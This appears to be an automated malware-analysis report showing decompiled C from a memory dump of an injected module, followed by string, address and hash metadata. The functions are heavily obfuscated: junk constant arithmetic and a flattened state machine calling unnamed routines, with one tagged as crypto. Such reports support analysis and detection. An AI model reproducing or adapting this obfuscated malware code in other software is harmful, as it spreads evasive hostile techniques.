				_v308 = _v308 >> 0xe;
				_v308 = _v308 ^ 0x0001bf3e;
				_v412 = 0x7616a8;
				_v412 = _v412 | 0x7bfedefd;
				_v412 = _v412 >> 2;
				_v412 = _v412 ^ 0x1ef4c93d;
				_v300 = 0x1188f;
				_v300 = _v300 ^ 0x999c13a2;
				_t855 = 0x7c;
				_v300 = _v300 * 0xd;
				_v300 = _v300 ^ 0xccf47946;
				_v244 = 0xfd649;
				_v244 = _v244 | 0xf733d813;
				_v244 = _v244 >> 0xd;
				_v244 = _v244 ^ 0x0005235a;
				_v200 = 0x9e9324;
				_v200 = _v200 | 0x5ba25bdd;
				_v200 = _v200 ^ 0x5bba349a;
				_v404 = 0x2330b2;
				_v404 = _v404 * 0x51;
				_v404 = _v404 * 0x1e;
				_v404 = _v404 / _t961;
				_v404 = _v404 ^ 0x08a702e8;
				_v260 = 0xc225de;
				_v260 = _v260 >> 4;
				_v260 = _v260 ^ 0x000fed8a;
				_v160 = 0x1c9307;
				_v160 = _v160 * 0x7e;
				_v160 = _v160 ^ 0x0e1bcc6b;
				_v192 = 0x8cb0be;
				_v192 = _v192 + 0x65a1;
				_v192 = _v192 ^ 0x008009d9;
				_v292 = 0x92bc67;
				_v292 = _v292 + 0xffffc3fd;
				_v292 = _v292 * 0x71;
				_v292 = _v292 ^ 0x40aaac18;
				_v372 = 0x5656da;
				_v372 = _v372 << 8;
				_v372 = _v372 | 0x5ef74142;
				_v372 = _v372 ^ 0xc573e6be;
				_v372 = _v372 ^ 0x9b83b24b;
				_v264 = 0xbc65cb;
				_v264 = _v264 / _t855;
				_v264 = _v264 >> 0x10;
				_v264 = _v264 ^ 0x0002a810;
				_v408 = 0xbec186;
				_v408 = _v408 + 0xffff9163;
				_t856 = 0x47;
				_v408 = _v408 * 0x59;
				_v408 = _v408 + 0xffff1ecb;
				_v408 = _v408 ^ 0x4229c32f;
				_v156 = 0x1bb444;
				_v156 = _v156 >> 0xc;
				_v156 = _v156 ^ 0x00030065;
				_v272 = 0x7ba9b3;
				_v272 = _v272 * 0x34;
				_v272 = _v272 >> 1;
				_v272 = _v272 ^ 0x0c847149;
				_v208 = 0xbd1be6;
				_v208 = _v208 | 0xd5578a84;
				_v208 = _v208 ^ 0xd5fa34ee;
				_v332 = 0xfe25dd;
				_v332 = _v332 * 0x2d;
				_v332 = _v332 | 0x1ec70227;
				_v332 = _v332 ^ 0x3eea9d65;
				_v444 = 0xc73971;
				_v444 = _v444 + 0xb32c;
				_v444 = _v444 | 0xfb97e021;
				_v444 = _v444 + 0xa24a;
				_v444 = _v444 ^ 0xfbde3b64;
				_v328 = 0xc31491;
				_v328 = _v328 / _t856;
				_t857 = 0x62;
				_v328 = _v328 / _t857;
				_v328 = _v328 ^ 0x0001fa75;
				_v184 = 0x1556a6;
				_v184 = _v184 | 0xd524b176;
				_v184 = _v184 ^ 0xd535a7ca;
				_v440 = 0x35c24;
				_v440 = _v440 | 0xb1338da5;
				_t858 = 0x12;
				_v440 = _v440 * 0x4e;
				_v440 = _v440 / _t858;
				_v440 = _v440 ^ 0x0e1fd3a6;
				_v168 = 0x2e720e;
				_v168 = _v168 ^ 0x20b0eb59;
				_v168 = _v168 ^ 0x209ff4ec;
				_v136 = 0xf8c881;
				_v136 = _v136 << 4;
				_v136 = _v136 ^ 0x0f86714c;
				_v176 = 0x30a8e4;
				_v176 = _v176 << 0xf;
				_v176 = _v176 ^ 0x54704d49;
				_v320 = 0xe820d3;
				_v320 = _v320 + 0x4a39;
				_v320 = _v320 + 0xffff8c06;
				_v320 = _v320 ^ 0x00e3b8f1;
				_v424 = 0xe23bc6;
				_v424 = _v424 | 0xb773a528;
				_v424 = _v424 + 0xffff9ee4;
				_v424 = _v424 + 0xd640;
				_v424 = _v424 ^ 0xb7f4e9e8;
				_v144 = 0x35d767;
				_v144 = _v144 | 0xb1fb0f4b;
				_v144 = _v144 ^ 0xb1f09f1e;
				_v432 = 0x220129;
				_v432 = _v432 + 0x2a56;
				_v432 = _v432 + 0xec9a;
				_v432 = _v432 | 0x35f45e8d;
				_v432 = _v432 ^ 0x35fbe95d;
				_v296 = 0x21bf48;
				_t859 = 0x63;
				_v296 = _v296 * 0x6e;
				_v296 = _v296 ^ 0xcf5ee5b0;
				_v296 = _v296 ^ 0xc1df8d86;
				_v128 = 0x83ca27;
				_v128 = _v128 >> 0xb;
				_v128 = _v128 ^ 0x0003e37b;
				_v416 = 0x1b76f6;
				_v416 = _v416 * 0x67;
				_v416 = _v416 ^ 0x5e43fefd;
				_v416 = _v416 | 0x6d16dae8;
				_v416 = _v416 ^ 0x7d5c7478;
				_v280 = 0x8e2df6;
				_v280 = _v280 ^ 0xeab8ff52;
				_v280 = _v280 | 0x6dde6fb0;
				_v280 = _v280 ^ 0xefff4d77;
				_v132 = 0xb4eda8;
				_v132 = _v132 + 0xffff14c3;
				_v132 = _v132 ^ 0x00bcd480;
				_v288 = 0x644029;
				_v288 = _v288 + 0xffff2e53;
				_v288 = _v288 / _t859;
				_v288 = _v288 ^ 0x00067a6b;
				_v216 = 0xec3ce2;
				_v216 = _v216 | 0x0e1cda73;
				_v216 = _v216 ^ 0x0ef221b1;
				_v256 = 0x587378;
				_v256 = _v256 + 0xc198;
				_t860 = 0x7d;
				_v256 = _v256 * 5;
				_v256 = _v256 ^ 0x01b10dc6;
				_v392 = 0x92ae50;
				_v392 = _v392 * 0x5f;
				_v392 = _v392 | 0xad1fc533;
				_v392 = _v392 << 7;
				_v392 = _v392 ^ 0xbff58d24;
				_v376 = 0xb00c13;
				_v376 = _v376 | 0x916d47ca;
				_v376 = _v376 ^ 0x4fad6c21;
				_v376 = _v376 ^ 0x8c20b6bd;
				_v376 = _v376 ^ 0x5270abc3;
				_v180 = 0x2c6669;
				_v180 = _v180 + 0xffff62ee;
				_v180 = _v180 ^ 0x00282217;
				_v188 = 0x326b32;
				_v188 = _v188 >> 0xf;
				_v188 = _v188 ^ 0x0007b375;
				_v196 = 0x9bd2c1;
				_v196 = _v196 << 4;
				_v196 = _v196 ^ 0x09b8b1db;
				_v204 = 0x1f9d8a;
				_v204 = _v204 + 0xffffb6a4;
				_v204 = _v204 ^ 0x0011e24b;
				_v384 = 0x673136;
				_v384 = _v384 << 0xa;
				_v384 = _v384 ^ 0x12bc0cc5;
				_v384 = _v384 / _t860;
				_v384 = _v384 ^ 0x01221bbd;
				_v212 = 0x91584a;
				_v212 = _v212 << 0xe;
				_v212 = _v212 ^ 0x561f57e7;
				_v240 = 0xb9c75a;
				_v240 = _v240 << 0x10;
				_v240 = _v240 | 0x65f0d503;
				_v240 = _v240 ^ 0xe7f439bf;
				_v360 = 0x5bc26f;
				_v360 = _v360 >> 4;
				_v360 = _v360 << 0xb;
				_t861 = 0x39;
				_v360 = _v360 / _t861;
				_v360 = _v360 ^ 0x00c77717;
				_v172 = 0x629181;
				_v172 = _v172 | 0xc284407b;
				_v172 = _v172 ^ 0xc2eb660c;
				_v316 = 0xe96bce;
				_v316 = _v316 + 0xffffcab9;
				_t862 = 0x1a;
				_v316 = _v316 / _t862;
				_v316 = _v316 ^ 0x000a023d;
				_v236 = 0xf837d5;
				_v236 = _v236 ^ 0x28ca4d9a;
				_t863 = 0xf;
				_v236 = _v236 / _t863;
				_v236 = _v236 ^ 0x02a25c79;
				_v324 = 0xcca430;
				_t864 = 0x58;
				_v324 = _v324 * 0x55;
				_v324 = _v324 / _t864;
				_v324 = _v324 ^ 0x00c4a948;
				_v448 = 0xca9885;
				_v448 = _v448 << 6;
				_t865 = 0x57;
				_v448 = _v448 * 0x76;
				_v448 = _v448 / _t865;
				_v448 = _v448 ^ 0x01076bc5;
				_v336 = 0x7ad46f;
				_v336 = _v336 + 0xffffd9cf;
				_t866 = 0x1d;
				_v336 = _v336 * 0x59;
				_v336 = _v336 ^ 0x2aa2cebc;
				_v252 = 0x3ea356;
				_v252 = _v252 << 1;
				_v252 = _v252 << 0x10;
				_v252 = _v252 ^ 0x46a0e067;
				_v148 = 0x4c106a;
				_v148 = _v148 >> 4;
				_v148 = _v148 ^ 0x0001e127;
				_v388 = 0x3a8b94;
				_v388 = _v388 + 0xffffc4aa;
				_v388 = _v388 + 0xffff3143;
				_v388 = _v388 / _t866;
				_v388 = _v388 ^ 0x000d4012;
				_v436 = 0xb558cd;
				_t867 = 0xe;
				_v436 = _v436 / _t867;
				_v436 = _v436 + 0x7cb9;
				_t962 = 0x4a7f8c3;
				_v104 = 0x800491f;
				_v436 = _v436 / _t961;
				_v436 = _v436 ^ 0x00055d95;
				_v268 = 0x4f2a38;
				_v268 = _v268 >> 9;
				_v268 = _v268 | 0xe8b3cd17;
				_v268 = _v268 ^ 0xe8bc8e8f;
				_v284 = 0x84377d;
				_v284 = _v284 << 0xf;
				_v284 = _v284 + 0xffff388a;
				_v284 = _v284 ^ 0x1bbc0ead;
				_v228 = 0x2ad291;
				_v228 = _v228 + 0x8129;
				_v228 = _v228 ^ 0xdb87be02;
				_v228 = _v228 ^ 0xdbac3157;
				_v396 = 0x7db796;
				_v396 = _v396 ^ 0x7a0b48f6;
				_v396 = _v396 ^ 0x3362827b;
				_v396 = _v396 + 0xffff5a7a;
				_v396 = _v396 ^ 0x4918c81d;
				_v152 = 0xea73bc;
				_v152 = _v152 | 0xe5873d2c;
				_v152 = _v152 ^ 0xe5ed942b;
				_v232 = 0xcef632;
				_v92 = 0x48;
				_v100 = 0x100;
				_v232 = _v232 * 0x56;
				_v232 = _v232 ^ 0x9c0a1ca3;
				_v232 = _v232 ^ 0xd98b3af2;
				_v344 = 0x56ea62;
				_v344 = _v344 << 9;
				_v344 = _v344 << 5;
				_v344 = _v344 ^ 0x4bc13b3f;
				_v344 = _v344 ^ 0xf15a9eb4;
				_v352 = 0xecd8a3;
				_v352 = _v352 << 6;
				_v352 = _v352 | 0x62fa7efd;
				_v352 = _v352 + 0xa6a5;
				_v352 = _v352 ^ 0x7bf0f0a6;
				while(1) {
					L1:
					_t812 = 0x5427714;
					while(1) {
						L2:
						while(1) {
							L3:
							_t939 = 0x38654c9;
							do {
								L4:
								_t971 = _t846 - _t962;
								if(_t971 > 0) {
									__eflags = _t846 - 0x5095c78;
									if(_t846 == 0x5095c78) {
										_t846 = 0x2905b1e;
										goto L34;
									} else {
										__eflags = _t846 - _t812;
										if(_t846 == _t812) {
											_t819 = E048C758F(_v108);
											_t846 = 0x17db3ff;
											__eflags = _t819;
											_t966 =  !=  ? 1 : _t966;
											goto L1;
										} else {
											__eflags = _t846 - 0x55ddb8b;
											if(__eflags == 0) {
												_push(_v392);
												_push(E048C1000);
												__eflags = E048D77BD( *((intOrPtr*)(_t959 + 4)), _v376,  &_v112, _v180, _v248, _v188, _v196, _v204,  *_t959, _v120, _v384, E048C3F5C(_v216, _v256, __eflags), _v212) - _v368;
												_t846 =  ==  ? 0x38654c9 : 0x1f4d081;
												E048E0352(_v240, _v360, _t820, _v172);
												_t967 = _t967 + 0x3c;
												goto L22;
											} else {
												__eflags = _t846 - 0x800491f;
												if(_t846 == 0x800491f) {
													_v116 = _v100;
													_t827 = E048C8B42(_v120,  &_v124, _v140, _v100, _v264, _v408, _v156, _v272);
													_t967 = _t967 + 0x18;
													__eflags = _t827 - _v400;
													_t877 = 0x3d1a83d;
													_t812 = 0x5427714;
													_t846 =  ==  ? 0x3d1a83d : 0xe2d4ad7;
													goto L3;
												} else {
													__eflags = _t846 - 0xe2d4ad7;
													if(_t846 != 0xe2d4ad7) {
														goto L34;
													} else {
														E048C2153(_v224, _v232, _v344, _v120, _v352);
													}
												}
											}
										}
									}
								} else {
									if(_t971 == 0) {
										_push(_v440);
										_push(E048C1000);
										_t964 = E048C3F5C(_v328, _v184, __eflags);
										_v116 = _v92;
										_t816 = E048C220A(_t813, _v124, _v340,  &_v76, _v168, _v136, _v176, _v320, _v424, _v144, _v92, _v92,  &_v116, _v432);
										_t967 = _t967 + 0x30;
										__eflags = _t816 - _v304;
										if(_t816 != _v304) {
											_t846 = 0x1f4d081;
										} else {
											E048C1ED4( &_v68, _v296,  *0x48e6048 + 0x24, 0x40, _v128, _v416);
											_t967 = _t967 + 0x10;
											_t846 = 0x55ddb8b;
										}
										E048E0352(_v280, _v132, _t964, _v288);
										goto L22;
									} else {
										if(_t846 == 0x17db3ff) {
											E048DCDFF(_v336, _v108, _v252);
											_t846 = 0x2a5562c;
											while(1) {
												L1:
												_t812 = 0x5427714;
												goto L2;
											}
										} else {
											if(_t846 == 0x1f4d081) {
												E048C1F77(_v124, _v284, _v228, _v396, _v152);
												_t967 = _t967 + 0xc;
												_t846 = 0xe2d4ad7;
												while(1) {
													L1:
													_t812 = 0x5427714;
													goto L2;
												}
											} else {
												if(_t846 == 0x2905b1e) {
													_push(_v220);
													_push(0x48c1150);
													_t831 = E048C3F5C(_v364, _v428, __eflags);
													_push(_v308);
													_push(0x48c1030);
													__eflags = E048D54FD(_v412,  &_v120, _t831, _v300, _v244, _v380, _v200, E048C3F5C(_v164, _v420, __eflags)) - _v348;
													_t846 =  ==  ? _v104 : 0x66c680f;
													E048E0352(_v404, _v260, _t831, _v160);
													E048E0352(_v192, _v292, _t832, _v372);
													_t959 = _v96;
													_t967 = _t967 + 0x38;
													L22:
													_t962 = 0x4a7f8c3;
													_t812 = 0x5427714;
													_t877 = 0x3d1a83d;
													_t939 = 0x38654c9;
													goto L34;
												} else {
													if(_t846 == 0x2a5562c) {
														E048C1F77(_v112, _v148, _v388, _v436, _v268);
														_t967 = _t967 + 0xc;
														_t846 = 0x1f4d081;
														while(1) {
															L1:
															_t812 = 0x5427714;
															goto L2;
														}
													} else {
														if(_t846 == _t939) {
															_t839 = E048DEC19(_v112, _v316, _v236,  &_v108, _v124, _v356, _v324);
															_t967 = _t967 + 0x14;
															__eflags = _t839;
															_t812 = 0x5427714;
															_t846 =  ==  ? 0x5427714 : 0x2a5562c;
															goto L2;
														} else {
															if(_t846 != _t877) {
																goto L34;
															} else {
																E048E3044(_v208, _v124, _v332, _v312, _v444);
																_t967 = _t967 + 0xc;
																_t846 =  ==  ? _t962 : 0x1f4d081;
																while(1) {
																	L1:
																	_t812 = 0x5427714;
																	L2:
																	L3:
																	_t939 = 0x38654c9;
																	goto L4;
																}
															}
														}
													}
												}
											}
										}
									}
								}
								L29:
								return _t966;
								L34:
								__eflags = _t846 - 0x66c680f;
							} while (__eflags != 0);
							goto L29;
						}
					}
				}
			}

0x048d7edb
0x048d7edd
0x048d7ee4
0x048d7ef1
0x048d7efc
0x048d7efe
0x048d7f05
0x048d7f0a
0x048d7f12
0x048d7f1d
0x048d7f22
0x048d7f28
0x048d7f2d
0x048d7f35
0x048d7f3d
0x048d7f45
0x048d7f4f
0x048d7f50
0x048d7f54
0x048d7f5c
0x048d7f67
0x048d7f72
0x048d7f7d
0x048d7f85
0x048d7f8a
0x048d7f8f
0x048d7f97
0x048d7f9f
0x048d7faa
0x048d7fbd
0x048d7fc4
0x048d7fcf
0x048d7fda
0x048d7fe5
0x048d7ff0
0x048d7ffb
0x048d8006
0x048d8011
0x048d801c
0x048d8027
0x048d8032
0x048d803d
0x048d8048
0x048d8053
0x048d805e
0x048d8069
0x048d8074
0x048d807c
0x048d8084
0x048d808c
0x048d8091
0x048d8099
0x048d80a1
0x048d80af
0x048d80b3
0x048d80bb
0x048d80c3
0x048d80ce
0x048d80d6
0x048d80e1
0x048d80ec
0x048d80f4
0x048d80f9
0x048d8101
0x048d8106
0x048d810e
0x048d811b
0x048d8127
0x048d812c
0x048d8130
0x048d8138
0x048d8140
0x048d814b
0x048d8156
0x048d8161
0x048d816c
0x048d8177
0x048d8182
0x048d818a
0x048d8192
0x048d819a
0x048d81a2
0x048d81aa
0x048d81b5
0x048d81c0
0x048d81c8
0x048d81d3
0x048d81db
0x048d81e3
0x048d81e8
0x048d81f0
0x048d81fb
0x048d8210
0x048d8211
0x048d8218
0x048d8223
0x048d822e
0x048d8239
0x048d8241
0x048d824c
0x048d8257
0x048d8262
0x048d826d
0x048d827a
0x048d8283
0x048d828f
0x048d8293
0x048d829b
0x048d82a6
0x048d82bc
0x048d82c7
0x048d82da
0x048d82e1
0x048d82ec
0x048d82f7
0x048d8302
0x048d830d
0x048d8318
0x048d832b
0x048d8332
0x048d833d
0x048d8345
0x048d834a
0x048d8352
0x048d835a
0x048d8362
0x048d8376
0x048d837d
0x048d8385
0x048d8390
0x048d839a
0x048d83a9
0x048d83ac
0x048d83b0
0x048d83b8
0x048d83c0
0x048d83cb
0x048d83d3
0x048d83de
0x048d83f1
0x048d83f8
0x048d83ff
0x048d840a
0x048d8415
0x048d8420
0x048d842b
0x048d843e
0x048d8445
0x048d8450
0x048d845b
0x048d8463
0x048d846b
0x048d8473
0x048d847b
0x048d8483
0x048d8499
0x048d84a7
0x048d84ac
0x048d84b5
0x048d84c0
0x048d84cb
0x048d84d6
0x048d84e1
0x048d84e9
0x048d84f6
0x048d84f7
0x048d8501
0x048d8505
0x048d850d
0x048d8518
0x048d8523
0x048d852e
0x048d8539
0x048d8541
0x048d854c
0x048d8557
0x048d855f
0x048d856a
0x048d8575
0x048d8580
0x048d858b
0x048d8596
0x048d859e
0x048d85a6
0x048d85ae
0x048d85b6
0x048d85be
0x048d85c9
0x048d85d4
0x048d85df
0x048d85e7
0x048d85ef
0x048d85f7
0x048d85ff
0x048d8607
0x048d861e
0x048d8621
0x048d8628
0x048d8633
0x048d863e
0x048d8649
0x048d8651
0x048d865c
0x048d8669
0x048d866d
0x048d8675
0x048d867d
0x048d8685
0x048d8690
0x048d869b
0x048d86a6
0x048d86b1
0x048d86bc
0x048d86c7
0x048d86d2
0x048d86dd
0x048d86f3
0x048d86fa
0x048d8705
0x048d8710
0x048d871b
0x048d8726
0x048d8731
0x048d8744
0x048d8745
0x048d874c
0x048d8757
0x048d8764
0x048d8768
0x048d8770
0x048d8775
0x048d877d
0x048d8785
0x048d878d
0x048d8795
0x048d879d
0x048d87a5
0x048d87b0
0x048d87bb
0x048d87c6
0x048d87d1
0x048d87d9
0x048d87e4
0x048d87ef
0x048d87f7
0x048d8802
0x048d880d
0x048d8818
0x048d8823
0x048d882b
0x048d8830
0x048d883e
0x048d8842
0x048d884a
0x048d8855
0x048d885d
0x048d8868
0x048d8873
0x048d887b
0x048d8886
0x048d8891
0x048d8899
0x048d889e
0x048d88ab
0x048d88b0
0x048d88b6
0x048d88be
0x048d88c9
0x048d88d4
0x048d88df
0x048d88ea
0x048d88fc
0x048d8901
0x048d890a
0x048d8915
0x048d8920
0x048d8932
0x048d8937
0x048d8940
0x048d894b
0x048d895e
0x048d8961
0x048d8973
0x048d897a
0x048d8985
0x048d898d
0x048d8997
0x048d899a
0x048d89a6
0x048d89aa
0x048d89b2
0x048d89bd
0x048d89d0
0x048d89d3
0x048d89da
0x048d89e5
0x048d89f0
0x048d89f7
0x048d89ff
0x048d8a0a
0x048d8a15
0x048d8a1d
0x048d8a28
0x048d8a30
0x048d8a38
0x048d8a48
0x048d8a4c
0x048d8a54
0x048d8a60
0x048d8a63
0x048d8a67
0x048d8a77
0x048d8a7c
0x048d8a87
0x048d8a8b
0x048d8a93
0x048d8a9e
0x048d8aa6
0x048d8ab1
0x048d8abc
0x048d8ac7
0x048d8acf
0x048d8ada
0x048d8ae5
0x048d8af0
0x048d8afb
0x048d8b06
0x048d8b11
0x048d8b19
0x048d8b21
0x048d8b29
0x048d8b31
0x048d8b39
0x048d8b44
0x048d8b4f
0x048d8b5a
0x048d8b6d
0x048d8b78
0x048d8b83
0x048d8b8a
0x048d8b95
0x048d8ba0
0x048d8ba8
0x048d8bad
0x048d8bb2
0x048d8bba
0x048d8bc2
0x048d8bca
0x048d8bcf
0x048d8bd7
0x048d8bdf
0x048d8be7
0x048d8be7
0x048d8be7
0x048d8bec
0x048d8bec
0x048d8bf1
0x048d8bf1
0x048d8bf1
0x048d8bf6
0x048d8bf6
0x048d8bf6
0x048d8bf8
0x048d8f0e
0x048d8f14
0x048d90a4
0x00000000
0x048d8f1a
0x048d8f1a
0x048d8f1c
0x048d908d
0x048d9094
0x048d909a
0x048d909c
0x00000000
0x048d8f22
0x048d8f22
0x048d8f28
0x048d8fdb
0x048d8fed
0x048d9059
0x048d9075
0x048d9079
0x048d907e
0x00000000
0x048d8f2e
0x048d8f2e
0x048d8f34
0x048d8f93
0x048d8fb4
0x048d8fbb
0x048d8fc7
0x048d8fc9
0x048d8fce
0x048d8fd3
0x00000000
0x048d8f36
0x048d8f36
0x048d8f3c
0x00000000
0x048d8f42
0x048d8f62
0x048d8f67
0x048d8f3c
0x048d8f34
0x048d8f28
0x048d8f1c
0x048d8bfe
0x048d8bfe
0x048d8e14
0x048d8e26
0x048d8e3d
0x048d8e46
0x048d8e8f
0x048d8e94
0x048d8e97
0x048d8e9e
0x048d8ed3
0x048d8ea0
0x048d8ec4
0x048d8ec9
0x048d8ecc
0x048d8ecc
0x048d8eee
0x00000000
0x048d8c04
0x048d8c0a
0x048d8e03
0x048d8e0a
0x048d8be7
0x048d8be7
0x048d8be7
0x00000000
0x048d8be7
0x048d8c10
0x048d8c16
0x048d8dd8
0x048d8ddd
0x048d8de0
0x048d8be7
0x048d8be7
0x048d8be7
0x00000000
0x048d8be7
0x048d8c1c
0x048d8c22
0x048d8cfa
0x048d8d09
0x048d8d0e
0x048d8d13
0x048d8d27
0x048d8d6c
0x048d8d80
0x048d8d89
0x048d8da4
0x048d8da9
0x048d8db0
0x048d8ef5
0x048d8ef5
0x048d8efa
0x048d8eff
0x048d8f04
0x00000000
0x048d8c28
0x048d8c2e
0x048d8ce8
0x048d8ced
0x048d8cf0
0x048d8be7
0x048d8be7
0x048d8be7
0x00000000
0x048d8be7
0x048d8c34
0x048d8c36
0x048d8caf
0x048d8cb4
0x048d8cbc
0x048d8cbe
0x048d8cc3
0x00000000
0x048d8c38
0x048d8c3a
0x00000000
0x048d8c40
0x048d8c60
0x048d8c67
0x048d8c78
0x048d8be7
0x048d8be7
0x048d8be7
0x048d8bec
0x048d8bf1
0x048d8bf1
0x00000000
0x048d8bf1
0x048d8be7
0x048d8c3a
0x048d8c36
0x048d8c2e
0x048d8c22
0x048d8c16
0x048d8c0a
0x048d8bfe
0x048d8f6c
0x048d8f76
0x048d90a9
0x048d90a9
0x048d90a9
0x00000000
0x048d90b5
0x048d8bf1
0x048d8bec

Strings

)@d, xrefs: 048D86D2
9J, xrefs: 048D8575
bV, xrefs: 048D8BA0
nz , xrefs: 048D7F7D
61g, xrefs: 048D8823
8*O, xrefs: 048D8A93
<, xrefs: 048D8705
H, xrefs: 048D8B6D
if,, xrefs: 048D87A5
IMpT, xrefs: 048D855F
xsX, xrefs: 048D8726
V*, xrefs: 048D85E7
e, xrefs: 048D83D3
[8, xrefs: 048D8027
xt\}, xrefs: 048D867D
2k2, xrefs: 048D87C6

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: )@d$2k2$61g$8*O$9J$H$IMpT$V*$[8$bV$e$if,$nz $xsX$xt\}$<
API String ID: 0-3960585842
Opcode ID: ac47fd441e26b81a3861c8300e1bb9897924074c01b5bf8dd15681abbd658a5d
Instruction ID: 35eaf6abab4d556b3782c24930f16cf8537e45913a1a63d2146f093d5f0f0096
Opcode Fuzzy Hash: ac47fd441e26b81a3861c8300e1bb9897924074c01b5bf8dd15681abbd658a5d
Instruction Fuzzy Hash: C092EE715093808FD379CF65C88AB9BBBE1BBC5308F108E1DE69A86260D7B19549CF47

Uniqueness

Uniqueness Score: -1.00%

Function 048C758F, Relevance: 19.5, Strings: 15, Instructions: 734
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E048C758F(intOrPtr __ecx) {
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				void* _t861;
				void* _t862;
				void* _t869;
				void* _t872;
				void* _t884;
				intOrPtr _t891;
				void* _t892;
				signed int _t894;
				char _t897;
				void* _t906;
				signed int _t912;
				signed int _t913;
				signed int _t914;
				signed int _t915;
				signed int _t916;
				signed int _t917;
				signed int _t918;
				signed int _t919;
				signed int _t920;
				signed int _t921;
				signed int _t922;
				signed int _t923;
				signed int _t924;
				signed int _t925;
				signed int _t926;
				signed int _t927;
				signed int _t928;
				signed int _t929;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				void* _t933;
				void* _t936;
				intOrPtr _t943;
				void* _t964;
				void* _t1012;
				void* _t1033;
				intOrPtr _t1035;
				void* _t1036;
				void* _t1041;
				signed int* _t1043;
				void* _t1047;

				_t1043 =  &_v420;
				_v256 = 0x4f9c4a;
				_v256 = _v256 * 0x68;
				_t1041 = 0;
				_t906 = 0xbe90c6a;
				_v72 = __ecx;
				_t912 = 0x7e;
				_v256 = _v256 / _t912;
				_v256 = _v256 ^ 0x4d03f198;
				_v364 = 0x177763;
				_v364 = _v364 + 0xffff64bb;
				_v364 = _v364 + 0xe006;
				_v364 = _v364 | 0x5810e9ef;
				_v364 = _v364 ^ 0x5817fdee;
				_v184 = 0xd17429;
				_v184 = _v184 >> 0xc;
				_v184 = _v184 ^ 0x00000d17;
				_v276 = 0x9cacd1;
				_v276 = _v276 | 0xea53a564;
				_t913 = 0x32;
				_v276 = _v276 * 0x12;
				_v276 = _v276 ^ 0x83ba3b3a;
				_v96 = 0xaecd02;
				_v96 = _v96 >> 9;
				_v96 = _v96 ^ 0x00005766;
				_v112 = 0x8c5899;
				_v112 = _v112 << 7;
				_v112 = _v112 ^ 0x462c4c80;
				_v292 = 0xa344d1;
				_v292 = _v292 ^ 0xc3a33b62;
				_v292 = _v292 >> 0xb;
				_v292 = _v292 ^ 0x0018600f;
				_v404 = 0x1a34bd;
				_v404 = _v404 / _t913;
				_t914 = 0x5c;
				_v404 = _v404 * 0x44;
				_v404 = _v404 ^ 0xb4a1f647;
				_v404 = _v404 ^ 0xb48255f7;
				_v156 = 0xeafd99;
				_v156 = _v156 ^ 0x78d68cc4;
				_v156 = _v156 ^ 0x783c715d;
				_v224 = 0x8d6eca;
				_v224 = _v224 + 0xffff086d;
				_v224 = _v224 << 9;
				_v224 = _v224 ^ 0x18ee6e00;
				_v332 = 0xc8bb61;
				_v332 = _v332 | 0x502870a4;
				_v332 = _v332 ^ 0xadb60793;
				_v332 = _v332 / _t914;
				_v332 = _v332 ^ 0x02c1084f;
				_v316 = 0xc820aa;
				_v316 = _v316 << 0xb;
				_v316 = _v316 + 0xb3c5;
				_v316 = _v316 << 0xf;
				_v316 = _v316 ^ 0x01e28000;
				_v356 = 0x969b2a;
				_v356 = _v356 >> 7;
				_v356 = _v356 >> 0xf;
				_t915 = 0x6b;
				_v356 = _v356 / _t915;
				_v356 = _v356 ^ 0x00000020;
				_v84 = 0xf2d01e;
				_v84 = _v84 ^ 0x2e4ac247;
				_v84 = _v84 ^ 0x2ebb6aea;
				_v144 = 0x74b502;
				_v144 = _v144 << 0xb;
				_v144 = _v144 ^ 0xa5a8359a;
				_v104 = 0x21a83d;
				_v104 = _v104 ^ 0x216ff468;
				_v104 = _v104 ^ 0x2146570e;
				_v220 = 0xb21177;
				_v220 = _v220 >> 2;
				_v220 = _v220 ^ 0x31fb2637;
				_v220 = _v220 ^ 0x31de94da;
				_v284 = 0x1ac8ae;
				_t916 = 0x2e;
				_v284 = _v284 * 0x56;
				_v284 = _v284 ^ 0x0f377588;
				_v284 = _v284 ^ 0x07c7370c;
				_v384 = 0x8eb0ef;
				_v384 = _v384 ^ 0x44be37ca;
				_v384 = _v384 << 7;
				_v384 = _v384 + 0xf6fc;
				_v384 = _v384 ^ 0x184fc2e2;
				_v376 = 0xa77a1b;
				_v376 = _v376 + 0x8c24;
				_v376 = _v376 | 0x82392e71;
				_v376 = _v376 << 6;
				_v376 = _v376 ^ 0xae40acf4;
